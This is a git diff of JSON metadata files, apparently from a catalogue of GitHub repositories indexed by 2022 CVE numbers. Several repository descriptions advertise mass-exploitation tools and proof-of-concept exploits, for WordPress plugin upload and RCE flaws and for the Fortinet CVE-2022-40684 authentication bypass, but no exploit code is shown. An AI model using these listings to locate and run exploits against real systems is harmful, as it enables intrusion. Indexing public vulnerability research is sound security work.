"https:\/\/github.com\/izdiwho\/CVE-2022-40317", + "description": null, + "fork": false, + "created_at": "2022-09-09T15:27:12Z", + "updated_at": "2023-08-05T08:20:06Z", + "pushed_at": "2022-09-10T03:08:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40347.json b/2022/CVE-2022-40347.json new file mode 100644 index 0000000000..d66d5ed00d --- /dev/null +++ b/2022/CVE-2022-40347.json @@ -0,0 +1,33 @@ +[ + { + "id": 602344088, + "name": "CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T02:16:51Z", + "updated_at": "2024-05-03T10:38:31Z", + "pushed_at": "2023-12-25T19:02:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40348.json b/2022/CVE-2022-40348.json new file mode 100644 index 0000000000..59b4570b5e --- /dev/null +++ b/2022/CVE-2022-40348.json @@ -0,0 +1,33 @@ +[ + { + "id": 602347294, + "name": "CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated", + "description": "CVE-2022-40348: Intern Record System - 'name' and 'email' Cross-site Scripting (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T02:29:33Z", + "updated_at": "2024-05-03T10:38:30Z", + "pushed_at": "2023-12-25T19:07:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40363.json b/2022/CVE-2022-40363.json new file mode 100644 index 0000000000..3c90ebe86f --- /dev/null +++ b/2022/CVE-2022-40363.json @@ -0,0 +1,33 @@ +[ + { + "id": 590734045, + "name": "CVE-2022-40363", + "full_name": "Olafdaf\/CVE-2022-40363", + "owner": { + "login": "Olafdaf", + "id": 123042506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123042506?v=4", + "html_url": "https:\/\/github.com\/Olafdaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Olafdaf\/CVE-2022-40363", + "description": "A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-19T04:19:42Z", + "updated_at": "2023-12-05T04:28:03Z", + "pushed_at": "2022-12-29T11:12:27Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4047.json b/2022/CVE-2022-4047.json new file mode 100644 index 0000000000..832bbc062c --- /dev/null +++ b/2022/CVE-2022-4047.json @@ -0,0 +1,75 @@ +[ + { + "id": 696655758, + "name": "WooRefer", + "full_name": "im-hanzou\/WooRefer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/WooRefer", + "description": "Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4047 - Return Refund and Exchange For WooCommerce < 4.0.9 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-09-26T07:23:44Z", + "updated_at": "2023-09-26T20:15:02Z", + "pushed_at": "2023-09-27T17:59:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "cve-2022-4047", + "exploit", + "mass-upload", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731486666, + "name": "CVE-2022-4047", + "full_name": "entroychang\/CVE-2022-4047", + "owner": { + "login": "entroychang", + "id": 56551382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56551382?v=4", + "html_url": "https:\/\/github.com\/entroychang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entroychang\/CVE-2022-4047", + "description": "CVE-2022-4047 poc", + "fork": false, + "created_at": "2023-12-14T07:36:01Z", + "updated_at": "2024-03-11T01:47:14Z", + "pushed_at": "2023-12-15T10:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40470.json b/2022/CVE-2022-40470.json new file mode 100644 index 0000000000..770ab0ccda --- /dev/null +++ b/2022/CVE-2022-40470.json @@ -0,0 +1,33 @@ +[ + { + "id": 560275929, + "name": "CVE-2022-40470", + "full_name": "RashidKhanPathan\/CVE-2022-40470", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-40470", + "description": "Cross Site Scripting in Blood Donor Management System Using CodeIgniter - 1.0", + "fork": false, + "created_at": "2022-11-01T05:36:20Z", + "updated_at": "2022-11-02T01:06:04Z", + "pushed_at": "2022-11-01T05:37:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40471.json b/2022/CVE-2022-40471.json new file mode 100644 index 0000000000..05d4b5134c --- /dev/null +++ b/2022/CVE-2022-40471.json @@ -0,0 +1,43 @@ +[ + { + "id": 550513650, + "name": "CVE-2022-40471", + "full_name": "RashidKhanPathan\/CVE-2022-40471", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-40471", + "description": "RCE Exploit and Research ", + "fork": false, + "created_at": "2022-10-12T22:33:31Z", + "updated_at": "2023-02-13T13:43:16Z", + "pushed_at": "2022-10-15T06:42:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "bug-hunting", + "cve-2022-40471", + "exploit", + "exploit-development", + "penetration-testing", + "python", + "security-research", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40490.json b/2022/CVE-2022-40490.json new file mode 100644 index 0000000000..6b6755cfbf --- /dev/null +++ b/2022/CVE-2022-40490.json @@ -0,0 +1,33 @@ +[ + { + "id": 542635261, + "name": "CVE-2022-40490", + "full_name": "whitej3rry\/CVE-2022-40490", + "owner": { + "login": "whitej3rry", + "id": 60222364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60222364?v=4", + "html_url": "https:\/\/github.com\/whitej3rry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whitej3rry\/CVE-2022-40490", + "description": "Tiny File Manager v2.4.7 and below are vulnerable to Cross Site Scripting", + "fork": false, + "created_at": "2022-09-28T14:32:41Z", + "updated_at": "2022-09-29T08:15:51Z", + "pushed_at": "2022-09-28T14:37:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40494.json b/2022/CVE-2022-40494.json new file mode 100644 index 0000000000..1d3a9a7cbc --- /dev/null +++ b/2022/CVE-2022-40494.json @@ -0,0 +1,41 @@ +[ + { + "id": 521183424, + "name": "nps-auth-bypass", + "full_name": "carr0t2\/nps-auth-bypass", + "owner": { + "login": "carr0t2", + "id": 62796978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62796978?v=4", + "html_url": "https:\/\/github.com\/carr0t2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carr0t2\/nps-auth-bypass", + "description": "nps认证绕过利用工具,CVE-2022-40494,使用此工具可在浏览器访问web控制端后台页面,或者批量获取socks5和http代理", + "fork": false, + "created_at": "2022-08-04T08:22:41Z", + "updated_at": "2024-11-02T09:54:15Z", + "pushed_at": "2022-08-19T09:04:09Z", + "stargazers_count": 300, + "watchers_count": 300, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bypass", + "cve", + "exp", + "fofa", + "nps", + "poc", + "proxy" + ], + "visibility": "public", + "forks": 39, + "watchers": 300, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4060.json b/2022/CVE-2022-4060.json new file mode 100644 index 0000000000..55360860ff --- /dev/null +++ b/2022/CVE-2022-4060.json @@ -0,0 +1,43 @@ +[ + { + "id": 692230555, + "name": "UPGer", + "full_name": "im-hanzou\/UPGer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/UPGer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-4060 - WordPress Plugin : User Post Gallery <= 2.19 - Unauthenticated RCE", + "fork": false, + "created_at": "2023-09-15T21:38:47Z", + "updated_at": "2024-11-21T14:53:58Z", + "pushed_at": "2023-09-16T21:55:56Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "check", + "cve-2022-4060", + "exploit", + "vulnerability", + "vulnerability-scanners", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4061.json b/2022/CVE-2022-4061.json new file mode 100644 index 0000000000..9de7f52a89 --- /dev/null +++ b/2022/CVE-2022-4061.json @@ -0,0 +1,42 @@ +[ + { + "id": 692616008, + "name": "JBWPer", + "full_name": "im-hanzou\/JBWPer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/JBWPer", + "description": "Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4061 - JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-09-17T03:20:23Z", + "updated_at": "2024-08-12T20:32:46Z", + "pushed_at": "2023-09-17T10:05:02Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "checker", + "cve-2022-4061", + "exploiter", + "shell-uploader", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40624.json b/2022/CVE-2022-40624.json new file mode 100644 index 0000000000..a858795c0b --- /dev/null +++ b/2022/CVE-2022-40624.json @@ -0,0 +1,33 @@ +[ + { + "id": 536848834, + "name": "pfBlockerNg-CVE-2022-40624", + "full_name": "dhammon\/pfBlockerNg-CVE-2022-40624", + "owner": { + "login": "dhammon", + "id": 69738058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4", + "html_url": "https:\/\/github.com\/dhammon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhammon\/pfBlockerNg-CVE-2022-40624", + "description": null, + "fork": false, + "created_at": "2022-09-15T03:24:55Z", + "updated_at": "2024-07-26T10:46:53Z", + "pushed_at": "2022-09-15T03:25:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4063.json b/2022/CVE-2022-4063.json new file mode 100644 index 0000000000..471b522376 --- /dev/null +++ b/2022/CVE-2022-4063.json @@ -0,0 +1,40 @@ +[ + { + "id": 690237690, + "name": "INPGer", + "full_name": "im-hanzou\/INPGer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/INPGer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-4063 - InPost Gallery < 2.1.4.1 - Unauthenticated LFI to RCE", + "fork": false, + "created_at": "2023-09-11T20:01:04Z", + "updated_at": "2023-09-23T08:46:35Z", + "pushed_at": "2023-09-15T21:07:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "checker", + "cve-2022-4063", + "exploit", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40634.json b/2022/CVE-2022-40634.json new file mode 100644 index 0000000000..e16f67356a --- /dev/null +++ b/2022/CVE-2022-40634.json @@ -0,0 +1,43 @@ +[ + { + "id": 725995761, + "name": "CVE-2022-40634", + "full_name": "mbadanoiu\/CVE-2022-40634", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-40634", + "description": "CVE-2022-40634: FreeMarker Server-Side Template Injection in CrafterCMS", + "fork": false, + "created_at": "2023-12-01T10:06:17Z", + "updated_at": "2023-12-01T10:26:02Z", + "pushed_at": "2023-12-01T10:22:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2020-25803", + "cve-2022-40634", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40635.json b/2022/CVE-2022-40635.json new file mode 100644 index 0000000000..03faa89fcc --- /dev/null +++ b/2022/CVE-2022-40635.json @@ -0,0 +1,42 @@ +[ + { + "id": 726003969, + "name": "CVE-2022-40635", + "full_name": "mbadanoiu\/CVE-2022-40635", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-40635", + "description": "CVE-2022-40635: Groovy Sandbox Bypass in CrafterCMS", + "fork": false, + "created_at": "2023-12-01T10:28:27Z", + "updated_at": "2023-12-08T07:22:30Z", + "pushed_at": "2023-12-01T10:33:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2022-40635", + "cves", + "groovy", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40684.json b/2022/CVE-2022-40684.json new file mode 100644 index 0000000000..6d30c8dc4e --- /dev/null +++ b/2022/CVE-2022-40684.json @@ -0,0 +1,731 @@ +[ + { + "id": 550911062, + "name": "CVE-2022-40684", + "full_name": "horizon3ai\/CVE-2022-40684", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-40684", + "description": "A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager", + "fork": false, + "created_at": "2022-10-13T14:24:12Z", + "updated_at": "2024-11-07T04:30:05Z", + "pushed_at": "2022-10-13T15:25:00Z", + "stargazers_count": 341, + "watchers_count": 341, + "has_discussions": false, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 90, + "watchers": 341, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 551028490, + "name": "CVE-2022-40684", + "full_name": "carlosevieira\/CVE-2022-40684", + "owner": { + "login": "carlosevieira", + "id": 24918013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24918013?v=4", + "html_url": "https:\/\/github.com\/carlosevieira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carlosevieira\/CVE-2022-40684", + "description": "PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)", + "fork": false, + "created_at": "2022-10-13T18:13:59Z", + "updated_at": "2024-08-12T20:27:46Z", + "pushed_at": "2022-10-13T20:13:44Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 87, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 551073912, + "name": "Fortinet-PoC-Auth-Bypass", + "full_name": "Filiplain\/Fortinet-PoC-Auth-Bypass", + "owner": { + "login": "Filiplain", + "id": 85502601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85502601?v=4", + "html_url": "https:\/\/github.com\/Filiplain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Filiplain\/Fortinet-PoC-Auth-Bypass", + "description": "Bash PoC for Fortinet Auth Bypass - CVE-2022-40684", + "fork": false, + "created_at": "2022-10-13T19:53:17Z", + "updated_at": "2024-05-07T17:16:35Z", + "pushed_at": "2023-04-02T12:44:53Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551104587, + "name": "CVE-2022-40684-POC", + "full_name": "kljunowsky\/CVE-2022-40684-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-40684-POC", + "description": "Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager", + "fork": false, + "created_at": "2022-10-13T21:07:50Z", + "updated_at": "2024-04-21T17:20:57Z", + "pushed_at": "2023-01-21T02:17:48Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "bugbounty", + "cve-2022-40684", + "exploit", + "fortios", + "fortiproxy", + "penetration-testing", + "poc", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551185144, + "name": "CVE-2022-40684", + "full_name": "secunnix\/CVE-2022-40684", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T01:07:01Z", + "updated_at": "2024-08-12T20:27:46Z", + "pushed_at": "2022-10-14T13:28:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 551411022, + "name": "CVE-2022-40684", + "full_name": "iveresk\/CVE-2022-40684", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T10:53:50Z", + "updated_at": "2022-10-17T02:03:27Z", + "pushed_at": "2022-10-17T16:42:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551413732, + "name": "CVE-2022-40684", + "full_name": "mhd108\/CVE-2022-40684", + "owner": { + "login": "mhd108", + "id": 52637601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52637601?v=4", + "html_url": "https:\/\/github.com\/mhd108", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhd108\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T11:00:40Z", + "updated_at": "2022-10-14T11:00:40Z", + "pushed_at": "2022-10-14T11:01:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551914399, + "name": "cve-2022-40684", + "full_name": "ClickCyber\/cve-2022-40684", + "owner": { + "login": "ClickCyber", + "id": 66947475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66947475?v=4", + "html_url": "https:\/\/github.com\/ClickCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClickCyber\/cve-2022-40684", + "description": "exploit for CVE-2022-40684 Fortinet", + "fork": false, + "created_at": "2022-10-15T11:34:17Z", + "updated_at": "2024-08-12T20:27:48Z", + "pushed_at": "2022-10-15T11:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552028942, + "name": "CVE-2022-40684", + "full_name": "Chocapikk\/CVE-2022-40684", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-40684", + "description": "Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]", + "fork": false, + "created_at": "2022-10-15T16:51:25Z", + "updated_at": "2024-10-11T04:59:31Z", + "pushed_at": "2022-10-19T16:27:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 552033176, + "name": "CVE-2022-40684", + "full_name": "mohamedbenchikh\/CVE-2022-40684", + "owner": { + "login": "mohamedbenchikh", + "id": 58364955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58364955?v=4", + "html_url": "https:\/\/github.com\/mohamedbenchikh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mohamedbenchikh\/CVE-2022-40684", + "description": "Exploit for CVE-2022-40684 vulnerability", + "fork": false, + "created_at": "2022-10-15T17:02:49Z", + "updated_at": "2024-05-02T10:58:24Z", + "pushed_at": "2022-10-15T17:03:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2022-40684", + "exploit", + "fortigate", + "fortipwn" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552090151, + "name": "CVE-2022-40684", + "full_name": "HAWA771\/CVE-2022-40684", + "owner": { + "login": "HAWA771", + "id": 88245571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88245571?v=4", + "html_url": "https:\/\/github.com\/HAWA771", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HAWA771\/CVE-2022-40684", + "description": "Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]", + "fork": false, + "created_at": "2022-10-15T19:43:48Z", + "updated_at": "2022-10-15T19:45:12Z", + "pushed_at": "2022-10-15T17:01:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 552157153, + "name": "CVE-2022-40684", + "full_name": "NeriaBasha\/CVE-2022-40684", + "owner": { + "login": "NeriaBasha", + "id": 99290038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99290038?v=4", + "html_url": "https:\/\/github.com\/NeriaBasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeriaBasha\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-16T00:23:16Z", + "updated_at": "2022-10-21T09:46:35Z", + "pushed_at": "2022-10-16T00:25:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552603702, + "name": "fortipwn", + "full_name": "Grapphy\/fortipwn", + "owner": { + "login": "Grapphy", + "id": 76534455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76534455?v=4", + "html_url": "https:\/\/github.com\/Grapphy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grapphy\/fortipwn", + "description": "Forti CVE-2022-40684 enumeration script built in Rust", + "fork": false, + "created_at": "2022-10-16T23:50:30Z", + "updated_at": "2022-10-24T10:59:14Z", + "pushed_at": 